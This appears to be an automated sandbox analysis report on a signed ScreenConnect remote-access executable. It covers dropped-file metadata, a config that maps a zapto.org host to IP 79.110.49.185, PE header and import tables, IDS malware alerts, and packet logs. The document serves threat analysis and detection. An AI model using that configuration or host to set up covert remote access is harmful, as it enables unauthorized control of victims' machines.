                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDmO/vXbAa3xT:2dL9hK6E46YPoXVvH
                                                                                                                                                                                                                                                      MD5:ACEA838653B74CFB402FC34FFDE3EEE5
                                                                                                                                                                                                                                                      SHA1:53972E41BBD01D64CF5FF39B18A98931AB73321F
                                                                                                                                                                                                                                                      SHA-256:2F1FFCDA60109D0274AC5D5AE0E655E569D8B6D916280FBDD96DB7C3F482D6C3
                                                                                                                                                                                                                                                      SHA-512:BCA06DBBF78F78EE6FA37A8C26492B6596A878DF4DABFFAFFA7AC07E3EEFECDE9619A033D609198F8C3420F69840DC4329359403A34EC0CA64FF929471AB19C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.42155814397974
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:fSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:qvloTMW+EZMM6DFyV03w
                                                                                                                                                                                                                                                      MD5:EB08CDBE19842F20E530A597EBBEF439
                                                                                                                                                                                                                                                      SHA1:CF0D6767B073927857FDA5699218C3E4922120D7
                                                                                                                                                                                                                                                      SHA-256:B73EC178D1DA61013CD9E056F279803D33D455F03C58E59B6D5EDDC07FBD348D
                                                                                                                                                                                                                                                      SHA-512:44198F8CF2AFD408AFF52F898A052AD6E9D90D3BFE7CB7FE688BE68DE5D43807EC960B5BD723FF5E05E4657A1ED271E53286D4AEDE6D232B3B703A4712BED8EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...j.'..............................................................................................................................................................................................................................................................................................................................................{<.^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):6.515414062276353
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:3coxOaV92n.exe
                                                                                                                                                                                                                                                      File size:83'360 bytes
                                                                                                                                                                                                                                                      MD5:8baaa006991b70783ed369d3ca853ca3
                                                                                                                                                                                                                                                      SHA1:c4821ff42774877ea91eb582da7a98cbea853dae
                                                                                                                                                                                                                                                      SHA256:8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71
                                                                                                                                                                                                                                                      SHA512:fb54cf0a475bf8c156c579ca248b196e7fefd9ab94e707c5a62d97787b41b0cd59b336898e7443d99abcf5ddd4033b1154eeaa5119f1cc222714db6128161fa4
                                                                                                                                                                                                                                                      SSDEEP:1536:+oG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYg73xh:2enkyfPAwiMq0RqRfbayZJYYg7
                                                                                                                                                                                                                                                      TLSH:3B835B53B5D18875E9730E3118B1E9B4593FBE110EA48DAF3398422A0F351D19E3AE7B
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                      Entrypoint:0x401489
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                      Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                      Error Number:0
Not Before: 17/08/2022 02:00:00
Not After: 16/08/2025 01:59:59
                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                      Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      call 00007FBB0C7F490Ah
                                                                                                                                                                                                                                                      jmp 00007FBB0C7F43BFh
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                                      call dword ptr [0040B048h]
                                                                                                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      call dword ptr [0040B044h]
                                                                                                                                                                                                                                                      push C0000409h
                                                                                                                                                                                                                                                      call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FBB0C7F4547h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2da0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | 3a86bd3d8ffe94b1ebad64876c0f831c | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.842507933211541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-25T19:29:27.806051+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49722 | TCP
2024-10-25T19:29:29.798570+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49723 | TCP
2024-10-25T19:29:35.382472+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49732 | TCP
2024-10-25T19:29:37.121763+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49735 | TCP
2024-10-25T19:29:39.555616+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49753 | TCP
2024-10-25T19:29:45.467567+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49780 | TCP
2024-10-25T19:29:46.823210+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49791 | TCP
2024-10-25T19:29:49.300665+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.5 | 49803 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.930996895 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.931024075 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.931116104 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.931138039 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.931185007 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.064364910 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.064398050 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.064475060 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.064501047 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.064570904 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161700010 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161726952 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161756039 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161791086 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161818027 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161849976 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.161983013 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.162154913 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.165539980 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.146617889 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.146660089 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.146852016 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.147551060 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.147567987 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.148909092 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.157633066 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.157670975 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521061897 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521085978 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521101952 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521200895 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521214962 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521246910 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521295071 CEST4434971179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521337032 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521337032 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.521337032 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.522438049 CEST49711443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:26.244554043 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:26.244590998 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:26.244697094 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:26.244997025 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:26.245007992 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.083800077 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.093686104 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.093723059 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592092991 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592116117 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592133045 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592217922 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592237949 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.592289925 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.594289064 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.594305992 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.594381094 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.594387054 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.648267031 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688313007 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688343048 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688409090 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688435078 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688453913 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.688472986 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.806077957 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.806107998 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.806247950 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.806277990 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.806323051 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.923075914 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.923099995 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.923196077 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.923223019 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:27.923268080 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064790964 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064851046 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064898014 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064927101 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064939976 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.064984083 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.068218946 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.068280935 CEST4434972279.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.068331003 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.112905025 CEST49722443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.221280098 CEST49723443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.221381903 CEST4434972379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.221477985 CEST49723443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.221700907 CEST49723443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:28.221735001 CEST4434972379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:35.518104076 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:35.518156052 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:35.518233061 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:35.518454075 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:35.518465042 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.354469061 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.354592085 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.411792994 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.411818027 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.412130117 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.412981987 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.455326080 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.773823977 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.773853064 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.773865938 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.774096966 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.774118900 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.774168015 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.889713049 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.889743090 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.890002012 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.890022993 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:36.890072107 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.006006002 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.006028891 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.006110907 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.006125927 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.007626057 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.121798992 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.121824980 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.121876001 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.121892929 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.121938944 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.237169027 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.237193108 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.237265110 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.237287045 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.237493038 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.352884054 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.352905989 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.352993965 CEST49735443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.353010893 CEST4434973579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:37.354876995 CEST49735443192.168.2.579.110.49.185
